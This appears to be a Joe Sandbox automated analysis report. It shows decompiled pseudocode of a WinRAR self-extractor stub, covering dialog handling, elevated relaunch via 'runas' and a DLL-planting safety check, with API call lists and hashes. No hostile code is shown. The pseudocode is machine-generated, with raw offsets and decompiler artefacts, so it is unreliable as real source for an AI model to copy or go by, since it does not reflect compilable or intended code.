                								L24:
                								_push(_t293);
                								L25:
                								EndDialog(_t311, ??); // executed
                								goto L128;
                							}
                							goto L103;
                						}
                					}
                				}
                				if(_t316 != 1) {
                					L6:
                					_t106 = 0;
                					goto L129;
                				}
                				_t152 = ( *(_t328 + 0x10) & 0x0000ffff) - 1;
                				if(_t152 == 0) {
                					__eflags =  *0x418455;
                					if( *0x418455 != 0) {
                						L21:
                						GetDlgItemTextW(_t311, 0x66, _t328 - 0x2474, 0x800);
                						__eflags =  *0x418455;
                						if( *0x418455 == 0) {
                							__eflags =  *0x418456;
                							if( *0x418456 == 0) {
                								_t155 = GetDlgItem(_t311, 0x68);
                								__eflags =  *0x41845c;
                								_t320 = _t155;
                								if( *0x41845c == 0) {
                									SendMessageW(_t320, 0xb1, 0, 0xffffffff);
                									SendMessageW(_t320, 0xc2, 0, 0x4035f4);
                								}
                								SetFocus(_t320);
                								__eflags =  *0x419468;
                								if( *0x419468 == 0) {
                									_t321 = 0x800;
                									E003E0602(_t328 - 0x1474, _t328 - 0x2474, 0x800);
                									E003ED453(_t296, _t328 - 0x1474, 0x800);
                									E003D4092(_t328 - 0x4974, 0x880, E003DE617(0xb9), _t328 - 0x1474);
                									_t330 = _t330 + 0x10;
                									_push(_t328 - 0x4974);
                									_push(0);
                									E003ED4D4();
                								} else {
                									_push(E003DE617(0xba));
                									_push(0);
                									E003ED4D4();
                									_t321 = 0x800;
                								}
                								__eflags =  *0x41a471;
                								if( *0x41a471 == 0) {
                									E003EDB4B(_t328 - 0x2474);
                								}
                								 *(_t328 - 0xd) = 0;
                								E003DA0B1(_t293, _t296, _t311, _t328, _t328 - 0x2474, 0, 0);
                								__eflags = 0;
                								if(0 != 0) {
                									L39:
                									_t302 = E003EAC04(_t328 - 0x2474);
                									 *((char*)(_t328 - 0xe)) = _t302;
                									__eflags = _t302;
                									if(_t302 == 0) {
                										_t263 = GetLastError();
                										_t302 =  *((intOrPtr*)(_t328 - 0xe));
                										__eflags = _t263 - 5;
                										if(_t263 == 5) {
                											 *(_t328 - 0xd) = _t293;
                										}
                									}
                									_t173 =  *0x41a471;
                									__eflags = _t173;
                									if(_t173 != 0) {
                										L48:
                										__eflags =  *((char*)(_t328 - 0xe));
                										if( *((char*)(_t328 - 0xe)) != 0) {
                											 *0x41844c = _t293;
                											E003D12F1(_t311, 0x67, 0);
                											E003D12F1(_t311, 0x66, 0);
                											SetDlgItemTextW(_t311, _t293, E003DE617(0xe6)); // executed
                											E003D12F1(_t311, 0x69, _t293);
                											SetDlgItemTextW(_t311, 0x65, 0x4035f4); // executed
                											_t322 = GetDlgItem(_t311, 0x65);
                											__eflags = _t322;
                											if(_t322 != 0) {
                												_t210 = GetWindowLongW(_t322, 0xfffffff0) | 0x00000080;
                												__eflags = _t210;
                												SetWindowLongW(_t322, 0xfffffff0, _t210);
                											}
                											_push(5);
                											_push( *0x42fc90);
                											_push(_t311);
                											E003EC73F(_t309, _t311);
                											_push(2);
                											_push( *0x42fc90);
                											_push(_t311);
                											E003EC73F(_t309, _t311);
                											_push(0x42ec90);
                											_push(_t311);
                											 *0x431cbc = _t293; // executed
                											E003EDA52(_t302, _t309, __eflags); // executed
                											_push(6);
                											_push( *0x42fc90);
                											 *0x431cbc = 0;
                											_push(_t311);
                											E003EC73F(_t309, _t311);
                											__eflags =  *0x418454;
                											if( *0x418454 == 0) {
                												__eflags =  *0x41845c;
                												if( *0x41845c == 0) {
                													__eflags =  *0x42fcac;
                													if( *0x42fcac == 0) {
                														_push(4);
                														_push( *0x42fc90);
                														_push(_t311); // executed
                														E003EC73F(_t309, _t311); // executed
                													}
                												}
                											}
                											E003D12D3(_t311, _t293, _t293);
                											 *0x41844c =  *0x41844c & 0x00000000;
                											__eflags =  *0x41844c;
                											_t186 =  *0x418454; // 0x1
                											goto L73;
                										}
                										__eflags = _t173;
                										if(_t173 != 0) {
                											goto L65;
                										}
                										goto L50;
                									} else {
                										__eflags = _t302;
                										if(_t302 == 0) {
                											L50:
                											_t220 =  *(_t328 - 0xd);
                											__eflags = _t220;
                											 *(_t328 - 0xd) = _t220 == 0;
                											__eflags = _t220;
                											if(_t220 == 0) {
                												L64:
                												__eflags =  *(_t328 - 0xd);
                												if( *(_t328 - 0xd) == 0) {
                													L11:
                													_push(0);
                													goto L25;
                												}
                												L65:
                												_push(E003DE617(0x9a));
                												E003D4092(_t328 - 0x3874, 0xa00, L"\"%s\"\n%s", _t328 - 0x2474);
                												E003D6D83(0x411098, _t293);
                												E003EA7E4(_t311, _t328 - 0x3874, E003DE617(0x96), 0x30);
                												 *0x41845c =  *0x41845c + 1;
                												goto L11;
                											}
                											GetModuleFileNameW(0, _t328 - 0x3474, _t321);
                											E003DF28C(0x41c472, _t328 - 0x574, 0x80);
                											_push(0x41b472);
                											E003D4092(_t328 - 0xfe8c, 0x430c, L"-el -s2 \"-d%s\" \"-sp%s\"", _t328 - 0x2474);
                											_t330 = _t330 + 0x14;
                											 *(_t328 - 0x58) = 0x3c;
                											 *((intOrPtr*)(_t328 - 0x54)) = 0x40;
                											 *((intOrPtr*)(_t328 - 0x48)) = _t328 - 0x3474;
                											 *((intOrPtr*)(_t328 - 0x44)) = _t328 - 0xfe8c;
                											 *(_t328 - 0x50) = _t311;
                											 *((intOrPtr*)(_t328 - 0x4c)) = L"runas";
                											 *(_t328 - 0x3c) = _t293;
                											 *((intOrPtr*)(_t328 - 0x38)) = 0;
                											 *((intOrPtr*)(_t328 - 0x40)) = 0x418468;
                											_t325 = CreateFileMappingW(0xffffffff, 0, 0x8000004, 0, 0x7104, L"winrarsfxmappingfile.tmp");
                											 *(_t328 - 0x14) = _t325;
                											__eflags = _t325;
                											if(_t325 == 0) {
                												 *(_t328 - 0x1c) =  *(_t328 - 0x14);
                											} else {
                												 *0x427b80 = 0;
                												_t245 = GetCommandLineW();
                												__eflags = _t245;
                												if(_t245 != 0) {
                													E003E0602(0x427b82, _t245, 0x2000);
                												}
                												E003EB425(0x41c472, 0x42bb82, 7);
                												E003EB425(0x41c472, 0x42cb82, 2);
                												E003EB425(0x41c472, 0x42db82, 0x10);
                												 *0x42ec83 = _t293;
                												E003DF3FA(_t293, 0x42eb82, _t328 - 0x574);
                												 *(_t328 - 0x1c) = MapViewOfFile(_t325, 2, 0, 0, 0);
                												E003F0320(_t252, 0x427b80, 0x7104);
                												_t330 = _t330 + 0xc;
                											}
                											_t234 = ShellExecuteExW(_t328 - 0x58);
                											E003DF445(_t328 - 0x574, 0x80);
                											E003DF445(_t328 - 0xfe8c, 0x430c);
                											__eflags = _t234;
                											if(_t234 == 0) {
                												_t327 =  *(_t328 - 0x1c);
                												 *(_t328 - 0xd) = _t293;
                												goto L62;
                											} else {
                												 *0x4330a4( *(_t328 - 0x20), 0x2710);
                												_t67 = _t328 - 0x18;
                												 *_t67 =  *(_t328 - 0x18) & 0x00000000;
                												__eflags =  *_t67;
                												_t327 =  *(_t328 - 0x1c);
                												while(1) {
                													__eflags =  *_t327;
                													if( *_t327 != 0) {
                														break;
                													}
                													Sleep(0x64);
                													_t244 =  *(_t328 - 0x18) + 1;
                													 *(_t328 - 0x18) = _t244;
                													__eflags = _t244 - 0x64;
                													if(_t244 < 0x64) {
                														continue;
                													}
                													break;
                												}
                												 *0x42fcac =  *(_t328 - 0x20);
                												L62:
                												__eflags =  *(_t328 - 0x14);
                												if( *(_t328 - 0x14) != 0) {
                													UnmapViewOfFile(_t327);
                													CloseHandle( *(_t328 - 0x14));
                												}
                												goto L64;
                											}
                										}
                										E003D4092(_t328 - 0x1474, _t321, L"__tmp_rar_sfx_access_check_%u", GetTickCount());
                										_t330 = _t330 + 0x10;
                										E003D9556(_t328 - 0x34ac);
                										 *(_t328 - 4) =  *(_t328 - 4) & 0x00000000;
                										_t260 = E003D966E(_t328 - 0x34ac, _t328 - 0x1474, 0x11);
                										 *((char*)(_t328 - 0xe)) = _t260;
                										__eflags = _t260;
                										if(_t260 == 0) {
                											_t262 = GetLastError();
                											__eflags = _t262 - 5;
                											if(_t262 == 5) {
                												 *(_t328 - 0xd) = _t293;
                											}
                										}
                										_t37 = _t328 - 4;
                										 *_t37 =  *(_t328 - 4) | 0xffffffff;
                										__eflags =  *_t37;
                										_t302 = _t328 - 0x34ac;
                										E003D959A(_t328 - 0x34ac); // executed
                										_t173 =  *0x41a471;
                										goto L48;
                									}
                								} else {
                									_t264 = GetLastError();
                									__eflags = _t264 - 5;
                									if(_t264 == 5) {
                										L38:
                										 *(_t328 - 0xd) = _t293;
                										goto L39;
                									}
                									__eflags = _t264 - 3;
                									if(_t264 != 3) {
                										goto L39;
                									}
                									goto L38;
                								}
                							} else {
                								_t186 = _t293;
                								 *0x418454 = _t186;
                								L73:
                								__eflags =  *0x41845c;
                								if( *0x41845c <= 0) {
                									goto L24;
                								}
                								__eflags = _t186;
                								if(_t186 != 0) {
                									goto L24;
                								}
                								 *0x418455 = _t293;
                								SetDlgItemTextW(_t311, _t293, E003DE617(0x90));
                								_t323 =  *0x411098;
                								__eflags = _t323 - 9;
                								if(_t323 != 9) {
                									__eflags = _t323 - 3;
                									_t193 = ((_t323 != 0x00000003) - 0x00000001 & 0x0000000b) + 0x97;
                									__eflags = ((_t323 != 0x00000003) - 0x00000001 & 0x0000000b) + 0x97;
                								} else {
                									_t193 = 0xa0;
                								}
                								E003E0602(_t328 - 0x474, E003DE617(_t193), 0x200);
                								__eflags = _t323 - 9;
                								if(_t323 == 9) {
                									__eflags =  *0x41c574;
                									if( *0x41c574 != 0) {
                										_t201 = E003F3E13(_t328 - 0x474);
                										_t202 = E003DE617(0xa1);
                										__eflags = 0x200;
                										E003D4092(_t328 - 0x474 + _t201 * 2, 0x200 - _t201, L"\n%s", _t202);
                									}
                								}
                								E003EA7E4(_t311, _t328 - 0x474, E003DE617(0x96), 0x30);
                								goto L128;
                							}
                						}
                						_t293 = 1;
                						__eflags =  *0x418456;
                						if( *0x418456 == 0) {
                							goto L24;
                						}
                						goto L23;
                					}
                					__eflags =  *0x431cbc;
                					if( *0x431cbc == 0) {
                						goto L21;
                					} else {
                						__eflags =  *0x431cbd;
                						 *0x431cbd = _t152 & 0xffffff00 |  *0x431cbd == 0x00000000;
                						SetDlgItemTextW(_t311, 1, E003DE617(((_t152 & 0xffffff00 |  *0x431cbd == 0x00000000) & 0x000000ff) + 0xe6));
                						while(1) {
                							__eflags =  *0x431cbd;
                							if( *0x431cbd == 0) {
                								goto L128;
                							}
                							__eflags =  *0x418454;
                							if( *0x418454 != 0) {
                								goto L128;
                							}
                							_t278 = GetMessageW(_t328 - 0x74, 0, 0, 0);
                							__eflags = _t278;
                							if(_t278 == 0) {
                								goto L128;
                							} else {
                								_t280 = IsDialogMessageW(_t311, _t328 - 0x74);
                								__eflags = _t280;
                								if(_t280 == 0) {
                									TranslateMessage(_t328 - 0x74);
                									DispatchMessageW(_t328 - 0x74);
                								}
                								continue;
                							}
                						}
                						goto L128;
                					}
                				}
                				_t285 = _t152 - 1;
                				if(_t285 == 0) {
                					__eflags =  *0x41844c;
                					 *0x418454 = 1;
                					if( *0x41844c == 0) {
                						goto L11;
                					}
                					__eflags =  *0x41845c;
                					if( *0x41845c != 0) {
                						goto L128;
                					}
                					goto L11;
                				}
                				if(_t285 == 0x65) {
                					_push(0x800);
                					_t289 = E003D124F(_t311, E003DE617(0x64), _t328 - 0x1474);
                					__eflags = _t289;
                					if(_t289 == 0) {
                						goto L128;
                					} else {
                						_push(_t328 - 0x1474);
                						_push(0x66);
                						goto L127;
                					}
                				}
                				goto L6;
                			}

                APIs
                • __EH_prolog.LIBCMT ref: 003EB7E5
                  • Part of subcall function 003D1316: GetDlgItem.USER32(00000000,00003021), ref: 003D135A
                  • Part of subcall function 003D1316: SetWindowTextW.USER32(00000000,004035F4), ref: 003D1370
                • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 003EB8D1
                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 003EB8EF
                • IsDialogMessageW.USER32(?,?), ref: 003EB902
                • TranslateMessage.USER32(?), ref: 003EB910
                • DispatchMessageW.USER32(?), ref: 003EB91A
                • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 003EB93D
                • EndDialog.USER32(?,00000001), ref: 003EB960
                • GetDlgItem.USER32(?,00000068), ref: 003EB983
                • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 003EB99E
                • SendMessageW.USER32(00000000,000000C2,00000000,004035F4), ref: 003EB9B1
                  • Part of subcall function 003ED453: _wcschr.LIBVCRUNTIME ref: 003ED45C
                  • Part of subcall function 003ED453: _wcslen.LIBCMT ref: 003ED47D
                • SetFocus.USER32(00000000), ref: 003EB9B8
                • _swprintf.LIBCMT ref: 003EBA24
                  • Part of subcall function 003D4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 003D40A5
                  • Part of subcall function 003ED4D4: GetDlgItem.USER32(00000068,0042FCB8), ref: 003ED4E8
                  • Part of subcall function 003ED4D4: ShowWindow.USER32(00000000,00000005,?,?,?,003EAF07,00000001,?,?,003EB7B9,0040506C,0042FCB8,0042FCB8,00001000,00000000,00000000), ref: 003ED510
                  • Part of subcall function 003ED4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 003ED51B
                  • Part of subcall function 003ED4D4: SendMessageW.USER32(00000000,000000C2,00000000,004035F4), ref: 003ED529
                  • Part of subcall function 003ED4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 003ED53F
                  • Part of subcall function 003ED4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 003ED559
                  • Part of subcall function 003ED4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 003ED59D
                  • Part of subcall function 003ED4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 003ED5AB
                  • Part of subcall function 003ED4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 003ED5BA
                  • Part of subcall function 003ED4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 003ED5E1
                  • Part of subcall function 003ED4D4: SendMessageW.USER32(00000000,000000C2,00000000,004043F4), ref: 003ED5F0
                • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 003EBA68
                • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 003EBA90
                • GetTickCount.KERNEL32 ref: 003EBAAE
                • _swprintf.LIBCMT ref: 003EBAC2
                • GetLastError.KERNEL32(?,00000011), ref: 003EBAF4
                • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 003EBB43
                • _swprintf.LIBCMT ref: 003EBB7C
                • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 003EBBD0
                • GetCommandLineW.KERNEL32 ref: 003EBBEA
                • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 003EBC47
                • ShellExecuteExW.SHELL32(0000003C), ref: 003EBC6F
                • Sleep.KERNEL32(00000064), ref: 003EBCB9
                • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 003EBCE2
                • CloseHandle.KERNEL32(00000000), ref: 003EBCEB
                • _swprintf.LIBCMT ref: 003EBD1E
                • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 003EBD7D
                • SetDlgItemTextW.USER32(?,00000065,004035F4), ref: 003EBD94
                • GetDlgItem.USER32(?,00000065), ref: 003EBD9D
                • GetWindowLongW.USER32(00000000,000000F0), ref: 003EBDAC
                • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 003EBDBB
                • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 003EBE68
                • _wcslen.LIBCMT ref: 003EBEBE
                • _swprintf.LIBCMT ref: 003EBEE8
                • SendMessageW.USER32(?,00000080,00000001,?), ref: 003EBF32
                • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 003EBF4C
                • GetDlgItem.USER32(?,00000068), ref: 003EBF55
                • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 003EBF6B
                • GetDlgItem.USER32(?,00000066), ref: 003EBF85
                • SetWindowTextW.USER32(00000000,0041A472), ref: 003EBFA7
                • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 003EC007
                • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 003EC01A
                • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 003EC0BD
                • EnableWindow.USER32(00000000,00000000), ref: 003EC197
                • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 003EC1D9
                  • Part of subcall function 003EC73F: __EH_prolog.LIBCMT ref: 003EC744
                • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 003EC1FD
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: Message$ItemSend$Text$Window$_swprintf$File$DialogErrorLast$H_prologLongView_wcslen$CloseCommandCountCreateDispatchEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmap__vswprintf_c_l_wcschr
                • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$^>$__tmp_rar_sfx_access_check_%u$h>$winrarsfxmappingfile.tmp$Q@
                • API String ID: 4093411769-888710539
                • Opcode ID: 0bf0b7fa1ab7c76db387bb5967c9e62ec4e90b0b818555b8ce4351a1119c72bd
                • Instruction ID: 8c521bed33d199decca48e70cf7fc9dd635c4daf35a301fa754c2783232099ca
                • Opcode Fuzzy Hash: 0bf0b7fa1ab7c76db387bb5967c9e62ec4e90b0b818555b8ce4351a1119c72bd
                • Instruction Fuzzy Hash: 9542E7719442A4BAEB23AF719C4AFBF7B7CAB01700F104275F644AA1D2CB745E45CB29
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 268 3e0863-3e0886 call 3eec50 GetModuleHandleW 271 3e0888-3e089f GetProcAddress 268->271 272 3e08e7-3e0b48 268->272 275 3e08b9-3e08c9 GetProcAddress 271->275 276 3e08a1-3e08b7 271->276 273 3e0b4e-3e0b59 call 3f75fb 272->273 274 3e0c14-3e0c40 GetModuleFileNameW call 3dc29a call 3e0602 272->274 273->274 285 3e0b5f-3e0b8d GetModuleFileNameW CreateFileW 273->285 291 3e0c42-3e0c4e call 3db146 274->291 279 3e08cb-3e08e0 275->279 280 3e08e5 275->280 276->275 279->280 280->272 288 3e0b8f-3e0b9b SetFilePointer 285->288 289 3e0c08-3e0c0f CloseHandle 285->289 288->289 292 3e0b9d-3e0bb9 ReadFile 288->292 289->274 297 3e0c7d-3e0ca4 call 3dc310 GetFileAttributesW 291->297 298 3e0c50-3e0c5b call 3e081b 291->298 292->289 294 3e0bbb-3e0be0 292->294 296 3e0bfd-3e0c06 call 3e0371 294->296 296->289 304 3e0be2-3e0bfc call 3e081b 296->304 306 3e0cae 297->306 307 3e0ca6-3e0caa 297->307 298->297 309 3e0c5d-3e0c7b CompareStringW 298->309 304->296 311 3e0cb0-3e0cb5 306->311 307->291 310 3e0cac 307->310 309->297 309->307 310->311 313 3e0cec-3e0cee 311->313 314 3e0cb7 311->314 316 3e0dfb-3e0e05 313->316 317 3e0cf4-3e0d0b call 3dc2e4 call 3db146 313->317 315 3e0cb9-3e0ce0 call 3dc310 GetFileAttributesW 314->315 323 3e0cea 315->323 324 3e0ce2-3e0ce6 315->324 327 3e0d0d-3e0d6e call 3e081b * 2 call 3de617 call 3d4092 call 3de617 call 3ea7e4 317->327 328 3e0d73-3e0da6 call 3d4092 AllocConsole 317->328 323->313 324->315 326 3e0ce8 324->326 326->313 334 3e0df3-3e0df5 ExitProcess 327->334 333 3e0da8-3e0ded GetCurrentProcessId AttachConsole call 3f3e13 GetStdHandle WriteConsoleW Sleep FreeConsole 328->333 328->334 333->334
                C-Code - Quality: 72%
                			E003E0863(void* __edx, char _a3, unsigned int _a4, short* _a8, short* _a12, short* _a16, short* _a20, short* _a24, short* _a28, short* _a32, short* _a36, short* _a40, short* _a44, short* _a48, short* _a52, short* _a56, short* _a60, short* _a64, short* _a68, short* _a72, short* _a76, short* _a80, short* _a84, short* _a88, short* _a92, short* _a96, short* _a100, short* _a104, short* _a108, short* _a112, short* _a116, short* _a120, short* _a124, short* _a128, short* _a132, short* _a136, short* _a140, short* _a144, short* _a148, short* _a152, short* _a156, short* _a160, short* _a164, short* _a168, short* _a172, short* _a176, short* _a180, short* _a184, short* _a188, short* _a192, short* _a196, short* _a200, short* _a204, short* _a208, short* _a212, short* _a216, short* _a220, short* _a224, short* _a228, short* _a232, short* _a236, short* _a240, short* _a244, char _a248, char _a252, short _a756, short _a760, char _a768, short _a772, char _a4848, char _a4852, void _a4860, char _a4864, short _a4868, char _a9152, char _a9160, void _a13260, signed char _a46032) {
                				char _v1;
                				long _v4;
                				char* _t111;
                				int _t122;
                				long _t133;
                				void* _t149;
                				_Unknown_base(*)()* _t168;
                				struct _OVERLAPPED* _t174;
                				struct _OVERLAPPED* _t175;
                				signed char _t176;
                				_Unknown_base(*)()* _t177;
                				struct _OVERLAPPED* _t189;
                				long _t190;
                				void* _t191;
                				_Unknown_base(*)()* _t192;
                				struct HINSTANCE__* _t193;
                				signed int _t195;
                				struct _OVERLAPPED* _t196;
                				signed int _t197;
                				void* _t198;
                				_Unknown_base(*)()* _t199;
                				signed int _t200;
                				int _t201;
                				void* _t202;
                
                				E003EEC50(0xb3cc);
                				_t174 = 0;
                				_a3 = 0;
                				_t193 = GetModuleHandleW(L"kernel32");
                				if(_t193 != 0) {
                					_t168 = GetProcAddress(_t193, "SetDllDirectoryW");
                					_t176 = _a46032;
                					_t192 = _t168;
                					if(_t192 != 0) {
                						asm("sbb ecx, ecx");
                						_t177 = _t192;
                						 *0x403278( ~(_t176 & 0x000000ff) & 0x004035f4);
                						 *_t192();
                					}
                					_t199 = GetProcAddress(_t193, "SetDefaultDllDirectories");
                					if(_t199 != 0) {
                						_t177 = _t199;
                						 *0x403278((_t176 & 0x000000ff ^ 0x00000001) + 1 << 0xb);
                						 *_t199();
                						_v1 = 1;
                					}
                					_t174 = 0;
                				}
                				_t111 =  *0x40e1a4; // 0x403c2c
                				_t201 = _t200 | 0xffffffff;
                				_a8 = L"version.dll";
                				_t194 = 0x800;
                				_a12 = L"DXGIDebug.dll";
                				_a16 = L"sfc_os.dll";
                				_a20 = L"SSPICLI.DLL";
                				_a24 = L"rsaenh.dll";
                				_a28 = L"UXTheme.dll";
                				_a32 = L"dwmapi.dll";
                				_a36 = L"cryptbase.dll";
                				_a40 = L"lpk.dll";
                				_a44 = L"usp10.dll";
                				_a48 = L"clbcatq.dll";
                				_a52 = L"comres.dll";
                				_a56 = L"ws2_32.dll";
                				_a60 = L"ws2help.dll";
                				_a64 = L"psapi.dll";
                				_a68 = L"ieframe.dll";
                				_a72 = L"ntshrui.dll";
                				_a76 = L"atl.dll";
                				_a80 = L"setupapi.dll";
                				_a84 = L"apphelp.dll";
                				_a88 = L"userenv.dll";
                				_a92 = L"netapi32.dll";
                				_a96 = L"shdocvw.dll";
                				_a100 = L"crypt32.dll";
                				_a104 = L"msasn1.dll";
                				_a108 = L"cryptui.dll";
                				_a112 = L"wintrust.dll";
                				_a116 = L"shell32.dll";
                				_a120 = L"secur32.dll";
                				_a124 = L"cabinet.dll";
                				_a128 = L"oleaccrc.dll";
                				_a132 = L"ntmarta.dll";
                				_a136 = L"profapi.dll";
                				_a140 = L"WindowsCodecs.dll";
                				_a144 = L"srvcli.dll";
                				_a148 = L"cscapi.dll";
                				_a152 = L"slc.dll";
                				_a156 = L"imageres.dll";
                				_a160 = L"dnsapi.DLL";
                				_a164 = L"iphlpapi.DLL";
                				_a168 = L"WINNSI.DLL";
                				_a172 = L"netutils.dll";
                				_a176 = L"mpr.dll";
                				_a180 = L"devrtl.dll";
                				_a184 = L"propsys.dll";
                				_a188 = L"mlang.dll";
                				_a192 = L"samcli.dll";
                				_a196 = L"samlib.dll";
                				_a200 = L"wkscli.dll";
                				_a204 = L"dfscli.dll";
                				_a208 = L"browcli.dll";
                				_a212 = L"rasadhlp.dll";
                				_a216 = L"dhcpcsvc6.dll";
                				_a220 = L"dhcpcsvc.dll";
                				_a224 = L"XmlLite.dll";
                				_a228 = L"linkinfo.dll";
                				_a232 = L"cryptsp.dll";
                				_a236 = L"RpcRtRemote.dll";
                				_a240 = L"aclui.dll";
                				_a244 = L"dsrole.dll";
                				_a248 = L"peerdist.dll";
                				if( *_t111 == 0x78) {
                					L15:
                					GetModuleFileNameW(_t174,  &_a772, _t194);
                					E003E0602( &_a9160, E003DC29A(_t215,  &_a772), _t194);
                					_t189 = _t174;
                					do {
                						_t195 = _t174;
                						if(E003DB146() < 0x600) {
                							L19:
                							_t87 = _t195 * 4; // 0x403c7c
                							_t196 =  *(_t202 + _t87 + 0x18);
                							_push(0x800);
                							E003DC310(_t218,  &_a772, _t196);
                							_t122 = GetFileAttributesW( &_a760); // executed
                							if(_t122 != _t201) {
                								_t189 = _t196;
                								L23:
                								if(_v1 != 0) {
                									L29:
                									_t225 = _t189;
                									if(_t189 == 0) {
                										return _t122;
                									}
                									E003DC2E4(_t225,  &_a768);
                									if(E003DB146() < 0x600) {
                										_push( &_a9160);
                										_push( &_a768);
                										E003D4092( &_a4864, 0x864, L"Please remove %s from %s folder. It is unsecure to run %s until it is done.", _t189);
                										_t202 = _t202 + 0x18;
                										_t122 = AllocConsole();
                										__eflags = _t122;
                										if(_t122 != 0) {
                											__imp__AttachConsole(GetCurrentProcessId());
                											_t133 = E003F3E13( &_a4860);
                											WriteConsoleW(GetStdHandle(0xfffffff4),  &_a4860, _t133,  &_v4, 0);
                											Sleep(0x2710);
                											_t122 = FreeConsole();
                										}
                									} else {
                										E003E081B(L"dwmapi.dll");
                										E003E081B(L"uxtheme.dll");
                										_push( &_a9152);
                										_push( &_a760);
                										E003D4092( &_a4852, 0x864, E003DE617(0xf1), _t189);
                										_t202 = _t202 + 0x18;
                										_t122 = E003EA7E4(0,  &_a4848, E003DE617(0xf0), 0x30);
                									}
                									ExitProcess(0);
                								}
                								_t197 = 0;
                								while(1) {
                									_t93 = _t197 * 4; // 0x403d44
                									_t175 =  *(_t202 + _t93 + 0x38);
                									_push(0x800);
                									E003DC310(0,  &_a768, _t175);
                									_t122 = GetFileAttributesW( &_a756);
                									if(_t122 != _t201) {
                										break;
                									}
                									_t197 = _t197 + 1;
                									if(_t197 < 0x35) {
                										continue;
                									}
                									goto L29;
                								}
                								_t189 = _t175;
                								goto L29;
                							}
                							goto L20;
                						}
                						_t81 = _t195 * 4; // 0x403c7c, executed
                						_t149 = E003E081B( *((intOrPtr*)(_t202 + _t81 + 0x18))); // executed
                						if(_t149 == 0) {
                							goto L19;
                						}
                						_t122 = CompareStringW(0x400, 0x1001,  *(_t202 + 0x24 + _t195 * 4), _t201, L"DXGIDebug.dll", _t201); // executed
                						_t218 = _t122 - 2;
                						if(_t122 != 2) {
                							goto L20;
                						}
                						goto L19;
                						L20:
                						_t174 =  &(_t174->Internal);
                					} while (_t174 < 8);
                					goto L23;
                				} else {
                					_t190 = E003F75FB(_t177, _t111);
                					if(_t190 == 0) {
                						goto L15;
                					}
                					GetModuleFileNameW(_t174,  &_a4868, 0x800);
                					_t198 = CreateFileW( &_a4868, 0x80000000, 1, _t174, 3, _t174, _t174);
                					if(_t198 == _t201 || SetFilePointer(_t198, _t190, _t174, _t174) != _t190) {
                						L14:
                						CloseHandle(_t198);
                						_t194 = 0x800;
                						goto L15;
                					} else {
                						_t67 =  &_a4; // 0x403c7c
                						if(ReadFile(_t198,  &_a13260, 0x7ffe, _t67, _t174) == 0) {
                							goto L14;
                						}
                						_push(0x104);
                						 *((short*)(_t202 + 0x33e0 + (_a4 >> 1) * 2)) = 0;
                						_push( &_a252);
                						_push( &_a13260);
                						while(1) {
                							_t191 = E003E0371();
                							_t215 = _t191;
                							if(_t191 == 0) {
                								goto L14;
                							}
                							E003E081B( &_a252);
                							_push(0x104);
                							_push( &_a248);
                							_push(_t191);
                						}
                						goto L14;
                					}
                				}
                			}




























                APIs
                • GetModuleHandleW.KERNEL32(kernel32), ref: 003E087C
                • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 003E088E
                • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 003E08BF
                • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 003E0B69
                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003E0B83
                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 003E0B93
                • ReadFile.KERNEL32(00000000,?,00007FFE,|<@,00000000), ref: 003E0BB1
                • CloseHandle.KERNEL32(00000000), ref: 003E0C09
                • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 003E0C1E
